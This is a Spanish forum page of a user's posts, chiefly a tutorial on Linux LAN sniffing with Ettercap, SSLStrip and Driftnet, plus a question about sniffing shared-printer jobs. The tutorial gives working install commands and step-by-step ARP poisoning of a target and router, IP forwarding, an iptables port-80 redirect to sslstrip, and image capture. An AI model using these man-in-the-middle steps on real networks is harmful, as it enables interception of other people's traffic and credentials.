Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - mrfloffy

#1
HOW TO: SNIFFING EN LINUX (ETTERCAP+SSLSTRIP+DRIFTNET)

INTRODUCIÓN

Con este manual se pretende mostrar el funcionamiento de tres herramientas básicas de sniffing en el entorno linux.

- Ettercap:es un interceptor/sniffer/registrador para LANs con switch. Descargar Aquí (NG-0.7.3)

- SSLStrip:una herramienta que automatiza el ataque sobre la conexión SSL. Descargar Aquí (0.7)

- Driftnet:programa que escucha el tráfico de red y elige imágenes de flujos TCP que observa.Descargar Aquí (0.1.6)

INSTALACIÓN DE HERRAMIENTAS


ETTERCAP

Modo 1 (Recomendado):


wget http://downloads.sourceforge.net/project/ettercap/ettercap/NG-0.7.3/ettercap-NG-0.7.3.tar.gz?use_mirror=heanet
tar zxvf ettercap-NG-0.7.3.tar.gz
cd ettercap-NG-0.7.3/
./configure
make clean
make
make install


Modo 2:


sudo apt-get install ettercap


SSLSTRIP

Modo 1 (Recomendado):


wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz
tar zxvf sslstrip-0.7.tar.gz
cp -R sslstrip-0.7 /usr/bin/


DRIFTNET

Modo 1 (NO Recomendado):


wget http://www.ex-parrot.com/~chris/driftnet/driftnet-0.1.6.tar.gz
tar zxvf driftnet-0.1.6.tar.gz
cd driftnet-0.1.6
make
make install                        


Modo 2  (Recomendado):


apt-get install driftnet


EMPEZAMOS A USAR LAS HERRAMIENTAS

Bueno en este manual vamos hacer un supuesto de sniffing en una red inalámbrica (En este caso la mia xD)

Empecemos....

Parte 1 [Uso de Ettercap]

Uso General (Análisis de Tráfico)

1.Vamos a una shell
2. Ejecutamos el Ettercap : sudo ettercap -C
3.Sniff/Unified sniffing...(Imagen 1.1)
4.Escribimos el nombre de la interfaz en este caso wlan0 (para saber cual es iwconfig) i enter
5.Hosts/Scan for Hosts (Algunas veces se corta, volver a intentarlo y ya está)
6.Hosts/Host List
7.Seleccionamos el ip que nos interesa y pulsamos 1 y luego seleccionamos el router y pulsamos 2.
(El ip del router es normalmente 192.168.1.1 o 192.168.2.1)
8.Mitm/Arp Poisoning i escribimos "remote"(sin las ")
9.Start/Start Sniffing
10.View/View Connections
11.En este momento estaremos analizando el trafico de la red y en una ip concreta para analizar mas a fondo cada conexión solo hemos de pulsar enter encima, recordar que ahora el análisis no muestra contenido SSL.








Uso de Filtros

"PROXIMAMENTE"

Parte 2 [Uso de SSLSTRIP]


1.Accedemos a la carpeta del ssl strip, en nuestro caso (cd /usr/bin/sslstrip-0.7)
2.En la consola su y después echo "1" > /proc/sys/net/ipv4/ip_forward (Activar redirección de paquetes)
3.Después escribimos iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 44444 (Redireccionamos todo el tráfico del puerto 80 al puerto XXXX(44444)
4.Escribimos ls y luego CAT sslstrip.py (Gracias mokoMonster)
5.Esccribimos SUDO python sslstrip.py -l 44444 y ya estamos "capturando " contenido SSL


Parte 3 [Uso de Driftnet]


1.Escribimos en la consola sudo driftnet -i wlan0 (Donde wlan0 el nombre de la interfraz)
2.Para guardar una imagen pulsar encima



Próximamente actualizare el tema para que quede más detallado y añadiré algunas fotografías, para dudas o proposiciones (indebidas no gracias xD!) estaré encantado de recibirlas i también esperare actualizaciones

P.D=Arreglado lo del puerto xD
#2
Hacking / Duda Sobre Sniffing
5 Enero 2010, 13:52 PM
Hola,

Últimamente he estado indagando en herramientas de sniffing como ETTERCAP+SSL STRIP , DRIFNET i se me plantea una duda. En un supuesto donde estuviéramos en una red local con una impresora compartida seria posible snifear una hoja ha imprimir, teóricamente si pero existe algún soft que haga eso sino me interesaría información para empezar a desarrollarlo xD, eso si tengo suficiente lvl xD

Espero respuestas,Gracias